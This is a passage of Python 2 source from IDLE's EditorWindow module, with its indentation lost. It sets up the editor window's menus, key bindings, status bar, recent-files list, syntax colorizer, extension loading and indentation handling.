# Note - this may not reposition the window in Metacity
# if "/apps/metacity/general/disable_workarounds" is enabled
dlg = self.dlg
geom = (near.winfo_rootx() + 10, near.winfo_rooty() + 10)
dlg.withdraw()
dlg.geometry("=+%d+%d" % geom)
dlg.deiconify()
dlg.lift()
def destroy(self, ev=None):
self.dlg = None
self.parent = None
helpDialog = HelpDialog() # singleton instance
class EditorWindow(object):
from idlelib.Percolator import Percolator
from idlelib.ColorDelegator import ColorDelegator
from idlelib.UndoDelegator import UndoDelegator
from idlelib.IOBinding import IOBinding, filesystemencoding, encoding
from idlelib import Bindings
from Tkinter import Toplevel
from idlelib.MultiStatusBar import MultiStatusBar
help_url = None
def __init__(self, flist=None, filename=None, key=None, root=None):
if EditorWindow.help_url is None:
dochome = os.path.join(sys.prefix, 'Doc', 'index.html')
if sys.platform.count('linux'):
# look for html docs in a couple of standard places
pyver = 'python-docs-' + '%s.%s.%s' % sys.version_info[:3]
if os.path.isdir('/var/www/html/python/'): # "python2" rpm
dochome = '/var/www/html/python/index.html'
else:
basepath = '/usr/share/doc/' # standard location
dochome = os.path.join(basepath, pyver,
'Doc', 'index.html')
elif sys.platform[:3] == 'win':
chmfile = os.path.join(sys.prefix, 'Doc',
'Python%s.chm' % _sphinx_version())
if os.path.isfile(chmfile):
dochome = chmfile
elif macosxSupport.runningAsOSXApp():
# documentation is stored inside the python framework
dochome = os.path.join(sys.prefix,
'Resources/English.lproj/Documentation/index.html')
dochome = os.path.normpath(dochome)
if os.path.isfile(dochome):
EditorWindow.help_url = dochome
if sys.platform == 'darwin':
# Safari requires real file:-URLs
EditorWindow.help_url = 'file://' + EditorWindow.help_url
else:
EditorWindow.help_url = "http://docs.python.org/%d.%d" % sys.version_info[:2]
currentTheme=idleConf.CurrentTheme()
self.flist = flist
root = root or flist.root
self.root = root
try:
sys.ps1
except AttributeError:
sys.ps1 = '>>> '
self.menubar = Menu(root)
self.top = top = WindowList.ListedToplevel(root, menu=self.menubar)
if flist:
self.tkinter_vars = flist.vars
#self.top.instance_dict makes flist.inversedict available to
#configDialog.py so it can access all EditorWindow instances
self.top.instance_dict = flist.inversedict
else:
self.tkinter_vars = {} # keys: Tkinter event names
# values: Tkinter variable instances
self.top.instance_dict = {}
self.recent_files_path = os.path.join(idleConf.GetUserCfgDir(),
'recent-files.lst')
self.text_frame = text_frame = Frame(top)
self.vbar = vbar = Scrollbar(text_frame, name='vbar')
self.width = idleConf.GetOption('main','EditorWindow','width', type='int')
text_options = {
'name': 'text',
'padx': 5,
'wrap': 'none',
'width': self.width,
'height': idleConf.GetOption('main', 'EditorWindow', 'height', type='int')}
if TkVersion >= 8.5:
# Starting with tk 8.5 we have to set the new tabstyle option
# to 'wordprocessor' to achieve the same display of tabs as in
# older tk versions.
text_options['tabstyle'] = 'wordprocessor'
self.text = text = MultiCallCreator(Text)(text_frame, **text_options)
self.top.focused_widget = self.text
self.createmenubar()
self.apply_bindings()
self.top.protocol("WM_DELETE_WINDOW", self.close)
self.top.bind("<<close-window>>", self.close_event)
if macosxSupport.runningAsOSXApp():
# Command-W on editorwindows doesn't work without this.
text.bind('<<close-window>>', self.close_event)
# Some OS X systems have only one mouse button,
# so use control-click for pulldown menus there.
# (Note, AquaTk defines <2> as the right button if
# present and the Tk Text widget already binds <2>.)
text.bind("<Control-Button-1>",self.right_menu_event)
else:
# Elsewhere, use right-click for pulldown menus.
text.bind("<3>",self.right_menu_event)
text.bind("<<cut>>", self.cut)
text.bind("<<copy>>", self.copy)
text.bind("<<paste>>", self.paste)
text.bind("<<center-insert>>", self.center_insert_event)
text.bind("<<help>>", self.help_dialog)
text.bind("<<python-docs>>", self.python_docs)
text.bind("<<about-idle>>", self.about_dialog)
text.bind("<<open-config-dialog>>", self.config_dialog)
text.bind("<<open-module>>", self.open_module)
text.bind("<<do-nothing>>", lambda event: "break")
text.bind("<<select-all>>", self.select_all)
text.bind("<<remove-selection>>", self.remove_selection)
text.bind("<<find>>", self.find_event)
text.bind("<<find-again>>", self.find_again_event)
text.bind("<<find-in-files>>", self.find_in_files_event)
text.bind("<<find-selection>>", self.find_selection_event)
text.bind("<<replace>>", self.replace_event)
text.bind("<<goto-line>>", self.goto_line_event)
text.bind("<<smart-backspace>>",self.smart_backspace_event)
text.bind("<<newline-and-indent>>",self.newline_and_indent_event)
text.bind("<<smart-indent>>",self.smart_indent_event)
text.bind("<<indent-region>>",self.indent_region_event)
text.bind("<<dedent-region>>",self.dedent_region_event)
text.bind("<<comment-region>>",self.comment_region_event)
text.bind("<<uncomment-region>>",self.uncomment_region_event)
text.bind("<<tabify-region>>",self.tabify_region_event)
text.bind("<<untabify-region>>",self.untabify_region_event)
text.bind("<<toggle-tabs>>",self.toggle_tabs_event)
text.bind("<<change-indentwidth>>",self.change_indentwidth_event)
text.bind("<Left>", self.move_at_edge_if_selection(0))
text.bind("<Right>", self.move_at_edge_if_selection(1))
text.bind("<<del-word-left>>", self.del_word_left)
text.bind("<<del-word-right>>", self.del_word_right)
text.bind("<<beginning-of-line>>", self.home_callback)
if flist:
flist.inversedict[self] = key
if key:
flist.dict[key] = self
text.bind("<<open-new-window>>", self.new_callback)
text.bind("<<close-all-windows>>", self.flist.close_all_callback)
text.bind("<<open-class-browser>>", self.open_class_browser)
text.bind("<<open-path-browser>>", self.open_path_browser)
self.set_status_bar()
vbar['command'] = text.yview
vbar.pack(side=RIGHT, fill=Y)
text['yscrollcommand'] = vbar.set
fontWeight = 'normal'
if idleConf.GetOption('main', 'EditorWindow', 'font-bold', type='bool'):
fontWeight='bold'
text.config(font=(idleConf.GetOption('main', 'EditorWindow', 'font'),
idleConf.GetOption('main', 'EditorWindow',
'font-size', type='int'),
fontWeight))
text_frame.pack(side=LEFT, fill=BOTH, expand=1)
text.pack(side=TOP, fill=BOTH, expand=1)
text.focus_set()
# usetabs true -> literal tab characters are used by indent and
# dedent cmds, possibly mixed with spaces if
# indentwidth is not a multiple of tabwidth,
# which will cause Tabnanny to nag!
# false -> tab characters are converted to spaces by indent
# and dedent cmds, and ditto TAB keystrokes
# Although use-spaces=0 can be configured manually in config-main.def,
# configuration of tabs v. spaces is not supported in the configuration
# dialog. IDLE promotes the preferred Python indentation: use spaces!
usespaces = idleConf.GetOption('main', 'Indent', 'use-spaces', type='bool')
self.usetabs = not usespaces
# tabwidth is the display width of a literal tab character.
# CAUTION: telling Tk to use anything other than its default
# tab setting causes it to use an entirely different tabbing algorithm,
# treating tab stops as fixed distances from the left margin.
# Nobody expects this, so for now tabwidth should never be changed.
self.tabwidth = 8 # must remain 8 until Tk is fixed.
# indentwidth is the number of screen characters per indent level.
# The recommended Python indentation is four spaces.
self.indentwidth = self.tabwidth
self.set_notabs_indentwidth()
# If context_use_ps1 is true, parsing searches back for a ps1 line;
# else searches for a popular (if, def, ...) Python stmt.
self.context_use_ps1 = False
# When searching backwards for a reliable place to begin parsing,
# first start num_context_lines[0] lines back, then
# num_context_lines[1] lines back if that didn't work, and so on.
# The last value should be huge (larger than the # of lines in a
# conceivable file).
# Making the initial values larger slows things down more often.
self.num_context_lines = 50, 500, 5000000
self.per = per = self.Percolator(text)
self.undo = undo = self.UndoDelegator()
per.insertfilter(undo)
text.undo_block_start = undo.undo_block_start
text.undo_block_stop = undo.undo_block_stop
undo.set_saved_change_hook(self.saved_change_hook)
# IOBinding implements file I/O and printing functionality
self.io = io = self.IOBinding(self)
io.set_filename_change_hook(self.filename_change_hook)
# Create the recent files submenu
self.recent_files_menu = Menu(self.menubar)
self.menudict['file'].insert_cascade(3, label='Recent Files',
underline=0,
menu=self.recent_files_menu)
self.update_recent_files_list()
self.color = None # initialized below in self.ResetColorizer
if filename:
if os.path.exists(filename) and not os.path.isdir(filename):
io.loadfile(filename)
else:
io.set_filename(filename)
self.ResetColorizer()
self.saved_change_hook()
self.set_indentation_params(self.ispythonsource(filename))
self.load_extensions()
menu = self.menudict.get('windows')
if menu:
end = menu.index("end")
if end is None:
end = -1
if end >= 0:
menu.add_separator()
end = end + 1
self.wmenu_end = end
WindowList.register_callback(self.postwindowsmenu)
# Some abstractions so IDLE extensions are cross-IDE
self.askyesno = tkMessageBox.askyesno
self.askinteger = tkSimpleDialog.askinteger
self.showerror = tkMessageBox.showerror
self._highlight_workaround() # Fix selection tags on Windows
def _highlight_workaround(self):
# On Windows, Tk removes painting of the selection
# tags which is different behavior than on Linux and Mac.
# See issue14146 for more information.
if not sys.platform.startswith('win'):
return
text = self.text
text.event_add("<<Highlight-FocusOut>>", "<FocusOut>")
text.event_add("<<Highlight-FocusIn>>", "<FocusIn>")
def highlight_fix(focus):
sel_range = text.tag_ranges("sel")
if sel_range:
if focus == 'out':
HILITE_CONFIG = idleConf.GetHighlight(
idleConf.CurrentTheme(), 'hilite')
text.tag_config("sel_fix", HILITE_CONFIG)
text.tag_raise("sel_fix")
text.tag_add("sel_fix", *sel_range)
elif focus == 'in':
text.tag_remove("sel_fix", "1.0", "end")
text.bind("<<Highlight-FocusOut>>",
lambda ev: highlight_fix("out"))
text.bind("<<Highlight-FocusIn>>",
lambda ev: highlight_fix("in"))
def _filename_to_unicode(self, filename):
"""convert filename to unicode in order to display it in Tk"""
if isinstance(filename, unicode) or not filename:
return filename
else:
try:
return filename.decode(self.filesystemencoding)
except UnicodeDecodeError:
# XXX
try:
return filename.decode(self.encoding)
except UnicodeDecodeError:
# byte-to-byte conversion
return filename.decode('iso8859-1')
def new_callback(self, event):
dirname, basename = self.io.defaultfilename()
self.flist.new(dirname)
return "break"
def home_callback(self, event):
if (event.state & 4) != 0 and event.keysym == "Home":
# state&4==Control. If <Control-Home>, use the Tk binding.
return
if self.text.index("iomark") and \
self.text.compare("iomark", "<=", "insert lineend") and \
self.text.compare("insert linestart", "<=", "iomark"):
# In Shell on input line, go to just after prompt
insertpt = int(self.text.index("iomark").split(".")[1])
else:
line = self.text.get("insert linestart", "insert lineend")
for insertpt in xrange(len(line)):
if line[insertpt] not in (' ','\t'):
break
else:
insertpt=len(line)
lineat = int(self.text.index("insert").split('.')[1])
if insertpt == lineat:
insertpt = 0
dest = "insert linestart+"+str(insertpt)+"c"
if (event.state&1) == 0:
# shift was not pressed
self.text.tag_remove("sel", "1.0", "end")
else:
if not self.text.index("sel.first"):
self.text.mark_set("my_anchor", "insert") # there was no previous selection
else:
if self.text.compare(self.text.index("sel.first"), "<", self.text.index("insert")):
self.text.mark_set("my_anchor", "sel.first") # extend back
else:
self.text.mark_set("my_anchor", "sel.last") # extend forward
first = self.text.index(dest)
last = self.text.index("my_anchor")
if self.text.compare(first,">",last):
first,last = last,first
self.text.tag_remove("sel", "1.0", "end")
self.text.tag_add("sel", first, last)
self.text.mark_set("insert", dest)
self.text.see("insert")
return "break"
def set_status_bar(self):
self.status_bar = self.MultiStatusBar(self.top)
if macosxSupport.runningAsOSXApp():
# Insert some padding to avoid obscuring some of the statusbar
# by the resize widget.
self.status_bar.set_label('_padding1', ' ', side=RIGHT)
self.status_bar.set_label('column', 'Col: ?', side=RIGHT)
self.status_bar.set_label('line', 'Ln: ?', side=RIGHT)
self.status_bar.pack(side=BOTTOM, fill=X)
self.text.bind("<<set-line-and-column>>", self.set_line_and_column)
self.text.event_add("<<set-line-and-column>>",
"<KeyRelease>", "<ButtonRelease>")
self.text.after_idle(self.set_line_and_column)
def set_line_and_column(self, event=None):
line, column = self.text.index(INSERT).split('.')
self.status_bar.set_label('column', 'Col: %s' % column)
self.status_bar.set_label('line', 'Ln: %s' % line)
menu_specs = [
("file", "_File"),
("edit", "_Edit"),
("format", "F_ormat"),
("run", "_Run"),
("options", "_Options"),
("windows", "_Windows"),
("help", "_Help"),
]
if macosxSupport.runningAsOSXApp():
menu_specs[-2] = ("windows", "_Window")
def createmenubar(self):
mbar = self.menubar
self.menudict = menudict = {}
for name, label in self.menu_specs:
underline, label = prepstr(label)
menudict[name] = menu = Menu(mbar, name=name)
mbar.add_cascade(label=label, menu=menu, underline=underline)
if macosxSupport.isCarbonAquaTk(self.root):
# Insert the application menu
menudict['application'] = menu = Menu(mbar, name='apple')
mbar.add_cascade(label='IDLE', menu=menu)
self.fill_menus()
self.base_helpmenu_length = self.menudict['help'].index(END)
self.reset_help_menu_entries()
def postwindowsmenu(self):
# Only called when Windows menu exists
menu = self.menudict['windows']
end = menu.index("end")
if end is None:
end = -1
if end > self.wmenu_end:
menu.delete(self.wmenu_end+1, end)
WindowList.add_windows_to_menu(menu)
rmenu = None
def right_menu_event(self, event):
self.text.mark_set("insert", "@%d,%d" % (event.x, event.y))
if not self.rmenu:
self.make_rmenu()
rmenu = self.rmenu
self.event = event
iswin = sys.platform[:3] == 'win'
if iswin:
self.text.config(cursor="arrow")
for item in self.rmenu_specs:
try:
label, eventname, verify_state = item
except ValueError: # see issue1207589
continue
if verify_state is None:
continue
state = getattr(self, verify_state)()
rmenu.entryconfigure(label, state=state)
rmenu.tk_popup(event.x_root, event.y_root)
if iswin:
self.text.config(cursor="ibeam")
rmenu_specs = [
# ("Label", "<<virtual-event>>", "statefuncname"), ...
("Close", "<<close-window>>", None), # Example
]
def make_rmenu(self):
rmenu = Menu(self.text, tearoff=0)
for item in self.rmenu_specs:
label, eventname = item[0], item[1]
if label is not None:
def command(text=self.text, eventname=eventname):
text.event_generate(eventname)
rmenu.add_command(label=label, command=command)
else:
rmenu.add_separator()
self.rmenu = rmenu
def rmenu_check_cut(self):
return self.rmenu_check_copy()
def rmenu_check_copy(self):
try:
indx = self.text.index('sel.first')
except TclError:
return 'disabled'
else:
return 'normal' if indx else 'disabled'
def rmenu_check_paste(self):
try:
self.text.tk.call('tk::GetSelection', self.text, 'CLIPBOARD')
except TclError:
return 'disabled'
else:
return 'normal'
def about_dialog(self, event=None):
aboutDialog.AboutDialog(self.top,'About IDLE')
def config_dialog(self, event=None):
configDialog.ConfigDialog(self.top,'Settings')
def help_dialog(self, event=None):
if self.root:
parent = self.root
else:
parent = self.top
helpDialog.display(parent, near=self.top)
def python_docs(self, event=None):
if sys.platform[:3] == 'win':
try:
os.startfile(self.help_url)
except WindowsError as why:
tkMessageBox.showerror(title='Document Start Failure',
message=str(why), parent=self.text)
else:
webbrowser.open(self.help_url)
return "break"
def cut(self,event):
self.text.event_generate("<<Cut>>")
return "break"
def copy(self,event):
if not self.text.tag_ranges("sel"):
# There is no selection, so do nothing and maybe interrupt.
return
self.text.event_generate("<<Copy>>")
return "break"
def paste(self,event):
self.text.event_generate("<<Paste>>")
self.text.see("insert")
return "break"
def select_all(self, event=None):
self.text.tag_add("sel", "1.0", "end-1c")
self.text.mark_set("insert", "1.0")
self.text.see("insert")
return "break"
def remove_selection(self, event=None):
self.text.tag_remove("sel", "1.0", "end")
self.text.see("insert")
def move_at_edge_if_selection(self, edge_index):
"""Cursor move begins at start or end of selection
When a left/right cursor key is pressed create and return to Tkinter a
function which causes a cursor move from the associated edge of the
selection.
"""
self_text_index = self.text.index
self_text_mark_set = self.text.mark_set
edges_table = ("sel.first+1c", "sel.last-1c")
def move_at_edge(event):
if (event.state & 5) == 0: # no shift(==1) or control(==4) pressed
try:
self_text_index("sel.first")
self_text_mark_set("insert", edges_table[edge_index])
except TclError:
pass
return move_at_edge
def del_word_left(self, event):
self.text.event_generate('<Meta-Delete>')
return "break"
def del_word_right(self, event):
self.text.event_generate('<Meta-d>')
return "break"
def find_event(self, event):
SearchDialog.find(self.text)
return "break"
def find_again_event(self, event):
SearchDialog.find_again(self.text)
return "break"
def find_selection_event(self, event):
SearchDialog.find_selection(self.text)
return "break"
def find_in_files_event(self, event):
GrepDialog.grep(self.text, self.io, self.flist)
return "break"
def replace_event(self, event):
ReplaceDialog.replace(self.text)
return "break"
def goto_line_event(self, event):
text = self.text
lineno = tkSimpleDialog.askinteger("Goto",
"Go to line number:",parent=text)
if lineno is None:
return "break"
if lineno <= 0:
text.bell()
return "break"
text.mark_set("insert", "%d.0" % lineno)
text.see("insert")
def open_module(self, event=None):
# XXX Shouldn't this be in IOBinding or in FileList?
try:
name = self.text.get("sel.first", "sel.last")
except TclError:
name = ""
else:
name = name.strip()
name = tkSimpleDialog.askstring("Module",
"Enter the name of a Python module\n"
"to search on sys.path and open:",
parent=self.text, initialvalue=name)
if name:
name = name.strip()
if not name:
return
# XXX Ought to insert current file's directory in front of path
try:
(f, file, (suffix, mode, type)) = _find_module(name)
except (NameError, ImportError) as msg:
tkMessageBox.showerror("Import error", str(msg), parent=self.text)
return
if type != imp.PY_SOURCE:
tkMessageBox.showerror("Unsupported type",
"%s is not a source module" % name, parent=self.text)
return
if f:
f.close()
if self.flist:
self.flist.open(file)
else:
self.io.loadfile(file)
def open_class_browser(self, event=None):
filename = self.io.filename
if not filename:
tkMessageBox.showerror(
"No filename",
"This buffer has no associated filename",
master=self.text)
self.text.focus_set()
return None
head, tail = os.path.split(filename)
base, ext = os.path.splitext(tail)
from idlelib import ClassBrowser
ClassBrowser.ClassBrowser(self.flist, base, [head])
def open_path_browser(self, event=None):
from idlelib import PathBrowser
PathBrowser.PathBrowser(self.flist)
def gotoline(self, lineno):
if lineno is not None and lineno > 0:
self.text.mark_set("insert", "%d.0" % lineno)
self.text.tag_remove("sel", "1.0", "end")
self.text.tag_add("sel", "insert", "insert +1l")
self.center()
def ispythonsource(self, filename):
if not filename or os.path.isdir(filename):
return True
base, ext = os.path.splitext(os.path.basename(filename))
if os.path.normcase(ext) in (".py", ".pyw"):
return True
try:
f = open(filename)
line = f.readline()
f.close()
except IOError:
return False
return line.startswith('#!') and line.find('python') >= 0
def close_hook(self):
if self.flist:
self.flist.unregister_maybe_terminate(self)
self.flist = None
def set_close_hook(self, close_hook):
self.close_hook = close_hook
def filename_change_hook(self):
if self.flist:
self.flist.filename_changed_edit(self)
self.saved_change_hook()
self.top.update_windowlist_registry(self)
self.ResetColorizer()
def _addcolorizer(self):
if self.color:
return
if self.ispythonsource(self.io.filename):
self.color = self.ColorDelegator()
# can add more colorizers here...
if self.color:
self.per.removefilter(self.undo)
self.per.insertfilter(self.color)
self.per.insertfilter(self.undo)
def _rmcolorizer(self):
if not self.color:
return
self.color.removecolors()
self.per.removefilter(self.color)
self.color = None
def ResetColorizer(self):
"Update the colour theme"
# Called from self.filename_change_hook and from configDialog.py
self._rmcolorizer()
self._addcolorizer()
theme = idleConf.GetOption('main','Theme','name')
normal_colors = idleConf.GetHighlight(theme, 'normal')
cursor_color = idleConf.GetHighlight(theme, 'cursor', fgBg='fg')
select_colors = idleConf.GetHighlight(theme, 'hilite')
self.text.config(
foreground=normal_colors['foreground'],
background=normal_colors['background'],
insertbackground=cursor_color,
selectforeground=select_colors['foreground'],
selectbackground=select_colors['background'],
)
def ResetFont(self):
"Update the text widgets' font if it is changed"
# Called from configDialog.py
fontWeight='normal'
if idleConf.GetOption('main','EditorWindow','font-bold',type='bool'):
fontWeight='bold'
self.text.config(font=(idleConf.GetOption('main','EditorWindow','font'),
idleConf.GetOption('main','EditorWindow','font-size',
type='int'),
fontWeight))
def RemoveKeybindings(self):
"Remove the keybindings before they are changed."
# Called from configDialog.py
self.Bindings.default_keydefs = keydefs = idleConf.GetCurrentKeySet()
for event, keylist in keydefs.items():
self.text.event_delete(event, *keylist)
for extensionName in self.get_standard_extension_names():
xkeydefs = idleConf.GetExtensionBindings(extensionName)
if xkeydefs:
for event, keylist in xkeydefs.items():
self.text.event_delete(event, *keylist)
def ApplyKeybindings(self):
"Update the keybindings after they are changed"
# Called from configDialog.py
self.Bindings.default_keydefs = keydefs = idleConf.GetCurrentKeySet()
self.apply_bindings()
for extensionName in self.get_standard_extension_names():
xkeydefs = idleConf.GetExtensionBindings(extensionName)
if xkeydefs:
self.apply_bindings(xkeydefs)
#update menu accelerators
menuEventDict = {}
for menu in self.Bindings.menudefs:
menuEventDict[menu[0]] = {}
for item in menu[1]:
if item:
menuEventDict[menu[0]][prepstr(item[0])[1]] = item[1]
for menubarItem in self.menudict.keys():
menu = self.menudict[menubarItem]
end = menu.index(END)
if end is None:
# Skip empty menus
continue
end += 1
for index in range(0, end):
if menu.type(index) == 'command':
accel = menu.entrycget(index, 'accelerator')
if accel:
itemName = menu.entrycget(index, 'label')
event = ''
if menubarItem in menuEventDict:
if itemName in menuEventDict[menubarItem]:
event = menuEventDict[menubarItem][itemName]
if event:
accel = get_accelerator(keydefs, event)
menu.entryconfig(index, accelerator=accel)
def set_notabs_indentwidth(self):
"Update the indentwidth if changed and not using tabs in this window"
# Called from configDialog.py
if not self.usetabs:
self.indentwidth = idleConf.GetOption('main', 'Indent','num-spaces',
type='int')
def reset_help_menu_entries(self):
"Update the additional help entries on the Help menu"
help_list = idleConf.GetAllExtraHelpSourcesList()
helpmenu = self.menudict['help']
# first delete the extra help entries, if any
helpmenu_length = helpmenu.index(END)
if helpmenu_length > self.base_helpmenu_length:
helpmenu.delete((self.base_helpmenu_length + 1), helpmenu_length)
# then rebuild them
if help_list:
helpmenu.add_separator()
for entry in help_list:
cmd = self.__extra_help_callback(entry[1])
helpmenu.add_command(label=entry[0], command=cmd)
# and update the menu dictionary
self.menudict['help'] = helpmenu
def __extra_help_callback(self, helpfile):
"Create a callback with the helpfile value frozen at definition time"
def display_extra_help(helpfile=helpfile):
if not helpfile.startswith(('www', 'http')):
helpfile = os.path.normpath(helpfile)
if sys.platform[:3] == 'win':
try:
os.startfile(helpfile)
except WindowsError as why:
tkMessageBox.showerror(title='Document Start Failure',
message=str(why), parent=self.text)
else:
webbrowser.open(helpfile)
return display_extra_help
def update_recent_files_list(self, new_file=None):
"Load and update the recent files list and menus"
rf_list = []
if os.path.exists(self.recent_files_path):
with open(self.recent_files_path, 'r') as rf_list_file:
rf_list = rf_list_file.readlines()
if new_file:
new_file = os.path.abspath(new_file) + '\n'
if new_file in rf_list:
rf_list.remove(new_file) # move to top
rf_list.insert(0, new_file)
# clean and save the recent files list
bad_paths = []
for path in rf_list:
if '\0' in path or not os.path.exists(path[0:-1]):
bad_paths.append(path)
rf_list = [path for path in rf_list if path not in bad_paths]
ulchars = "1234567890ABCDEFGHIJK"
rf_list = rf_list[0:len(ulchars)]
try:
with open(self.recent_files_path, 'w') as rf_file:
rf_file.writelines(rf_list)
except IOError as err:
if not getattr(self.root, "recentfilelist_error_displayed", False):
self.root.recentfilelist_error_displayed = True
tkMessageBox.showerror(title='IDLE Error',
message='Unable to update Recent Files list:\n%s'
% str(err),
parent=self.text)
# for each edit window instance, construct the recent files menu
for instance in self.top.instance_dict.keys():
menu = instance.recent_files_menu
menu.delete(0, END) # clear, and rebuild:
for i, file_name in enumerate(rf_list):
file_name = file_name.rstrip() # zap \n
# make unicode string to display non-ASCII chars correctly
ufile_name = self._filename_to_unicode(file_name)
callback = instance.__recent_file_callback(file_name)
menu.add_command(label=ulchars[i] + " " + ufile_name,
command=callback,
underline=0)
def __recent_file_callback(self, file_name):
def open_recent_file(fn_closure=file_name):
self.io.open(editFile=fn_closure)
return open_recent_file
def saved_change_hook(self):
short = self.short_title()
long = self.long_title()
if short and long:
title = short + " - " + long
elif short:
title = short
elif long:
title = long
else:
title = "Untitled"
icon = short or long or title
if not self.get_saved():
title = "*%s*" % title
icon = "*%s" % icon
self.top.wm_title(title)
self.top.wm_iconname(icon)
def get_saved(self):
return self.undo.get_saved()
def set_saved(self, flag):
self.undo.set_saved(flag)
def reset_undo(self):
self.undo.reset_undo()
def short_title(self):
filename = self.io.filename
if filename:
filename = os.path.basename(filename)
# return unicode string to display non-ASCII chars correctly
return self._filename_to_unicode(filename)
def long_title(self):
# return unicode string to display non-ASCII chars correctly
return self._filename_to_unicode(self.io.filename or "")
def center_insert_event(self, event):
self.center()
def center(self, mark="insert"):
text = self.text
top, bot = self.getwindowlines()
lineno = self.getlineno(mark)
height = bot - top
newtop = max(1, lineno - height//2)
text.yview(float(newtop))
def getwindowlines(self):
text = self.text
top = self.getlineno("@0,0")
bot = self.getlineno("@0,65535")
if top == bot and text.winfo_height() == 1:
# Geometry manager hasn't run yet
height = int(text['height'])
bot = top + height - 1
return top, bot
def getlineno(self, mark="insert"):
text = self.text
return int(float(text.index(mark)))
def get_geometry(self):
"Return (width, height, x, y)"
geom = self.top.wm_geometry()
m = re.match(r"(\d+)x(\d+)\+(-?\d+)\+(-?\d+)", geom)
tuple = (map(int, m.groups()))
return tuple
def close_event(self, event):
self.close()
def maybesave(self):
if self.io:
if not self.get_saved():
if self.top.state()!='normal':
self.top.deiconify()
self.top.lower()
self.top.lift()
return self.io.maybesave()
def close(self):
reply = self.maybesave()
if str(reply) != "cancel":
self._close()
return reply
def _close(self):
if self.io.filename:
self.update_recent_files_list(new_file=self.io.filename)
WindowList.unregister_callback(self.postwindowsmenu)
self.unload_extensions()
self.io.close()
self.io = None
self.undo = None
if self.color:
self.color.close(False)
self.color = None
self.text = None
self.tkinter_vars = None
self.per.close()
self.per = None
self.top.destroy()
if self.close_hook:
# unless override: unregister from flist, terminate if last window
self.close_hook()
def load_extensions(self):
self.extensions = {}
self.load_standard_extensions()
def unload_extensions(self):
for ins in self.extensions.values():
if hasattr(ins, "close"):
ins.close()
self.extensions = {}
def load_standard_extensions(self):
for name in self.get_standard_extension_names():
try:
self.load_extension(name)
except:
print "Failed to load extension", repr(name)
import traceback
traceback.print_exc()
def get_standard_extension_names(self):
return idleConf.GetExtensions(editor_only=True)
def load_extension(self, name):
try:
mod = __import__(name, globals(), locals(), [])
except ImportError:
print "\nFailed to import extension: ", name
return
cls = getattr(mod, name)
keydefs = idleConf.GetExtensionBindings(name)
if hasattr(cls, "menudefs"):
self.fill_menus(cls.menudefs, keydefs)
ins = cls(self)
self.extensions[name] = ins
if keydefs:
self.apply_bindings(keydefs)
for vevent in keydefs.keys():
methodname = vevent.replace("-", "_")
while methodname[:1] == '<':
methodname = methodname[1:]
while methodname[-1:] == '>':
methodname = methodname[:-1]
methodname = methodname + "_event"
if hasattr(ins, methodname):
self.text.bind(vevent, getattr(ins, methodname))
def apply_bindings(self, keydefs=None):
if keydefs is None:
keydefs = self.Bindings.default_keydefs
text = self.text
text.keydefs = keydefs
for event, keylist in keydefs.items():
if keylist:
text.event_add(event, *keylist)
def fill_menus(self, menudefs=None, keydefs=None):
"""Add appropriate entries to the menus and submenus
Menus that are absent or None in self.menudict are ignored.
"""
if menudefs is None:
menudefs = self.Bindings.menudefs
if keydefs is None:
keydefs = self.Bindings.default_keydefs
menudict = self.menudict
text = self.text
for mname, entrylist in menudefs:
menu = menudict.get(mname)
if not menu:
continue
for entry in entrylist:
if not entry:
menu.add_separator()
else:
label, eventname = entry
checkbutton = (label[:1] == '!')
if checkbutton:
label = label[1:]
underline, label = prepstr(label)
accelerator = get_accelerator(keydefs, eventname)
def command(text=text, eventname=eventname):
text.event_generate(eventname)
if checkbutton:
var = self.get_var_obj(eventname, BooleanVar)
menu.add_checkbutton(label=label, underline=underline,
command=command, accelerator=accelerator,
variable=var)
else:
menu.add_command(label=label, underline=underline,
command=command,
accelerator=accelerator)
def getvar(self, name):
var = self.get_var_obj(name)
if var:
value = var.get()
return value
else:
raise NameError, name
def setvar(self, name, value, vartype=None):
var = self.get_var_obj(name, vartype)
if var:
var.set(value)
else:
raise NameError, name
def get_var_obj(self, name, vartype=None):
var = self.tkinter_vars.get(name)
if not var and vartype:
# create a Tkinter variable object with self.text as master:
self.tkinter_vars[name] = var = vartype(self.text)
return var
# Tk implementations of "virtual text methods" -- each platform
# reusing IDLE's support code needs to define these for its GUI's
# flavor of widget.
# Is character at text_index in a Python string? Return 0 for
# "guaranteed no", true for anything else. This info is expensive
# to compute ab initio, but is probably already known by the
# platform's colorizer.
def is_char_in_string(self, text_index):
if self.color:
# Return true iff colorizer hasn't (re)gotten this far
# yet, or the character is tagged as being in a string
return self.text.tag_prevrange("TODO", text_index) or \
"STRING" in self.text.tag_names(text_index)
else:
# The colorizer is missing: assume the worst
return 1
# If a selection is defined in the text widget, return (start,
# end) as Tkinter text indices, otherwise return (None, None)
def get_selection_indices(self):
try:
first = self.text.index("sel.first")
last = self.text.index("sel.last")
return first, last
except TclError:
return None, None
# Return the text widget's current view of what a tab stop means
# (equivalent width in spaces).
def get_tabwidth(self):
current = self.text['tabs'] or TK_TABWIDTH_DEFAULT
return int(current)
# Set the text widget's current view of what a tab stop means.
def set_tabwidth(self, newtabwidth):
text = self.text
if self.get_tabwidth() != newtabwidth:
pixels = text.tk.call("font", "measure", text["font"],
"-displayof", text.master,
"n" * newtabwidth)
text.configure(tabs=pixels)
# If ispythonsource and guess are true, guess a good value for
# indentwidth based on file content (if possible), and if
# indentwidth != tabwidth set usetabs false.
# In any case, adjust the Text widget's view of what a tab
# character means.
def set_indentation_params(self, ispythonsource, guess=True):
if guess and ispythonsource:
i = self.guess_indent()
if 2 <= i <= 8:
self.indentwidth = i
if self.indentwidth != self.tabwidth:
self.usetabs = False
self.set_tabwidth(self.tabwidth)
def smart_backspace_event(self, event):
text = self.text
first, last = self.get_selection_indices()
if first and last:
text.delete(first, last)
text.mark_set("insert", first)
return "break"
# Delete whitespace left, until hitting a real char or closest
# preceding virtual tab stop.
chars = text.get("insert linestart", "insert")
if chars == '':
if text.compare("insert", ">", "1.0"):
# easy: delete preceding newline
text.delete("insert-1c")
else:
text.bell() # at start of buffer
return "break"
if chars[-1] not in " \t":
# easy: delete preceding real char
text.delete("insert-1c")
return "break"
# Ick. It may require *inserting* spaces if we back up over a
# tab character! This is written to be clear, not fast.
tabwidth = self.tabwidth
have = len(chars.expandtabs(tabwidth))
assert have > 0
want = ((have - 1) // self.indentwidth) * self.indentwidth
# Debug prompt is multilined....
if self.context_use_ps1:
last_line_of_prompt = sys.ps1.split('\n')[-1]
else:
last_line_of_prompt = ''
ncharsdeleted = 0
while 1:
if chars == last_line_of_prompt:
break
chars = chars[:-1]
